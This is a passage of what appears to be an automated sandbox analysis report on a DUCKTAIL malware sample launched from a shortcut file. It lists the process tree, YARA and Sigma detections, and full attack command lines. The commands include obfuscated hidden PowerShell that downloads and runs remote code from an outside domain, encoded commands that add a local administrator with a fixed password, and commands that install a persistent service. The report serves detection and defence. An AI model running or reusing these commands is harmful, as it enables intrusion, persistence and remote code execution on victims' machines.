JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 10096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3604 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 4300 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3136 cmdline: "cmd.exe" /c sc stop "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 2784 cmdline: sc stop "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 6532 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 4184 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 6444 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 2200 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 5504 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 2268 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 4384 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)
    • powershell.exe (PID: 7548 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • myRdpService.exe (PID: 7224 cmdline: C:\Windows\Temp\myRdpService.exe cakoi10 MD5: F651568CD1F1A7ABAEDD4389DA3A2F14)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DUCKTAILAccording to Tony Lambert, this is a malware written in .NET. It was observed to be delivered using the .NET Single File deployment feature.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
cOOhDuNWt7.lnkJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
    cOOhDuNWt7.lnkSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x82:$r2: P^ow^eRSh^eLL

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.3084642389.0000013EDADAE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Ducktail_11Yara detected DucktailJoe Security
      0000002A.00000002.4163193855.00007FF7C2CF6000.00000004.00000001.01000000.0000000A.sdmphacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
      • 0xdac4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
      • 0x11f94:$a2: 0123456789012345678901234567890123456789
      • 0x328ac:$a3: NTPASSWORD
      • 0x2f774:$a4: LMPASSWORD
      • 0x5cc54:$a5: aad3b435b51404eeaad3b435b51404ee
      • 0x14f54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
      Process Memory Space: powershell.exe PID: 1276INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x27a39b:$b1: ::WriteAllBytes(
      • 0x36672d:$b1: ::WriteAllBytes(
      • 0xa56b4:$b2: ::FromBase64String(
      • 0x27c7f3:$b2: ::FromBase64String(
      • 0x348080:$b2: ::FromBase64String(
      • 0x34ca55:$b2: ::FromBase64String(
      • 0x34d54d:$b2: ::FromBase64String(
      • 0x34d5c2:$b2: ::FromBase64String(
      • 0x3578fb:$b2: ::FromBase64String(
      • 0x40f3a6:$b2: ::FromBase64String(
      • 0x40f960:$b2: ::FromBase64String(
      • 0x40fd22:$b2: ::FromBase64String(
      • 0x40ff9d:$b2: ::FromBase64String(
      • 0x410046:$b2: ::FromBase64String(
      • 0x4100af:$b2: ::FromBase64String(
      • 0x410114:$b2: ::FromBase64String(
      • 0x410178:$b2: ::FromBase64String(
      • 0x4101d9:$b2: ::FromBase64String(
      • 0x410267:$b2: ::FromBase64String(
      • 0x4102d4:$b2: ::FromBase64String(
      • 0x410344:$b2: ::FromBase64String(
      Process Memory Space: powershell.exe PID: 8236INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x2137c5:$b1: ::WriteAllBytes(
      • 0x202601:$b2: ::FromBase64String(
      • 0x2047ea:$b2: ::FromBase64String(
      • 0x205506:$b2: ::FromBase64String(
      • 0x20557b:$b2: ::FromBase64String(
      • 0x20b27e:$b2: ::FromBase64String(
      • 0x177a34:$b3: ::UTF8.GetString(
      • 0x2d0f6f:$s1: -join
      • 0x2ea5c1:$s1: -join
      • 0x2eaefe:$s1: -join
      • 0xc7c99:$s3: Reverse
      • 0xcfc40:$s3: Reverse
      • 0xcfc5f:$s3: Reverse
      • 0xd3714:$s3: Reverse
      • 0xd3759:$s3: Reverse
      • 0xdc4ba:$s3: Reverse
      • 0xdc4d3:$s3: Reverse
      • 0xe0057:$s3: Reverse
      • 0x14332b:$s3: reverse
      • 0x1433c6:$s3: reverse
      • 0x14be98:$s3: reverse
      Process Memory Space: svczHost.exe PID: 9772JoeSecurity_Ducktail_6Yara detected DucktailJoe Security
        Click to see the 1 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        42.2.myRdpService.exe.7ff7c27f0000.0.unpackhacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
        • 0x5118c4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
        • 0x515d94:$a2: 0123456789012345678901234567890123456789
        • 0x5366ac:$a3: NTPASSWORD
        • 0x533574:$a4: LMPASSWORD
        • 0x560a54:$a5: aad3b435b51404eeaad3b435b51404ee
        • 0x518d54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_8236.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xc5e5:$b1: ::WriteAllBytes(
        • 0x8a3c:$b2: ::FromBase64String(
        • 0xac26:$b2: ::FromBase64String(
        • 0xb943:$b2: ::FromBase64String(
        • 0x52e:$b3: ::UTF8.GetString(
        • 0x868d:$s1: -join
        • 0x23e:$s4: +=
        • 0x261:$s4: +=
        • 0x1e39:$s4: +=
        • 0x1efb:$s4: +=
        • 0x6122:$s4: +=
        • 0x823f:$s4: +=
        • 0x8529:$s4: +=
        • 0x866f:$s4: +=
        • 0xbaff:$s4: +=
        • 0xbcfc:$s4: +=
        • 0xdfbc:$s4: +=
        • 0x64891:$s4: +=
        • 0x64911:$s4: +=
        • 0x649d7:$s4: +=
        • 0x64a57:$s4: +=

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, ProcessId: 4484, ProcessName: cmd.exe
        Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, ProcessId: 4484, ProcessName: cmd.exe
        Sigma detected: PowerShell Base64 Encoded Invoke Keyword
        Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
        Sigma detected: PowerShell Base64 Encoded WMI Classes
        Source: Process startedAuthor: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution
        Sigma detected: Suspicious Encoded PowerShell Command Line
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand 